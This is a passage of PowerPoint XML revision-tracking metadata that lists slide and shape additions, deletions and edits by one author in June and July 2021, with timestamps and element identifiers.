          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-07-01T14:18:37.659" v="55" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1674251011" sldId="492"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2416641626" sldId="493"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="311612657" sldId="494"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3933795559" sldId="495"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="684404787" sldId="496"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3211001472" sldId="497"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1035595462" sldId="498"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1984385075" sldId="499"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3318379012" sldId="500"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2125122821" sldId="501"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="198983510" sldId="502"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="686110812" sldId="503"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3430879985" sldId="504"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1270554279" sldId="505"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="951356934" sldId="506"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1385115538" sldId="507"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="494372939" sldId="508"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{5B9B619E-E5DC-4376-BCE8-41ABC28F6C2F}" dt="2021-06-28T19:39:54.424" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2058254067" sldId="509"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T14:32:54.680" v="2383" actId="114"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1325061211" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="4" creationId="{7270DA90-D6FE-4817-A397-357C521964EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="5" creationId="{48882033-D690-4A32-BCE0-318BF52BC84B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="6" creationId="{FE279FE8-E095-4AD1-A1C6-C05FFE9ED9DC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="7" creationId="{F2871076-CFC8-4CD5-BF65-ECB4ACAEF8D8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T22:29:38.709" v="54" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2201572609" sldId="257"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:55:36.178" v="1173" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="450669007" sldId="258"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:30.358" v="1663" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2789471632" sldId="392"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3672303902" sldId="393"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="2" creationId="{4DFC9DA3-4DF5-4CDD-A4D5-ABF5F3B6A19C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:52.319" v="855" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="3" creationId="{3507DC5C-F3FB-4642-B4AE-4880A33EF9EE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="5" creationId="{C786A172-1DBB-4248-816F-8360E8C049B9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:47.575" v="852" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="13" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="18" creationId="{1BFE218D-FB3A-4368-96C3-B96769DF124E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="19" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:38:38.614" v="913" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="20" creationId="{757F14FD-64BA-4DDF-B4D5-245746F36427}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:38:40.798" v="914" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:spMk id="22" creationId="{C6A14005-6231-4D70-9780-009B13F0E95F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:38:34.926" v="912" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:picMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:picMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:picMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:49.222" v="854" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:picMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:38:33.015" v="911" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:picMk id="16" creationId="{6F0EFB53-6476-4967-842A-513591BADBE5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:48.486" v="853" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:cxnSpMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:cxnSpMk id="15" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:cxnSpMk id="17" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:43.838" v="851" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3672303902" sldId="393"/>
            <ac:cxnSpMk id="21" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2467691949" sldId="394"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:46.726" v="1039" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="3" creationId="{76E1B39B-59AC-4EE1-87FD-39C3199A948A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="4" creationId="{FDBE572F-22D3-45AD-BB83-0839FFD36676}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="6" creationId="{DCCBDC01-C63B-404C-8A7A-2499B6D9921C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="7" creationId="{D8C915EB-F20A-424B-BF00-010E7C88E5FF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="8" creationId="{A2208B58-0E66-44D6-BA81-6687A0D72552}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="9" creationId="{B77186E0-B800-4374-B26A-C7364B884258}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:46.726" v="1039" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:46.726" v="1039" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="14" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:46.726" v="1039" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="17" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:46.726" v="1039" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2467691949" sldId="394"/>
            <ac:spMk id="22" creationId="{16115475-8B62-47B5-80A6-1F1F393306CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
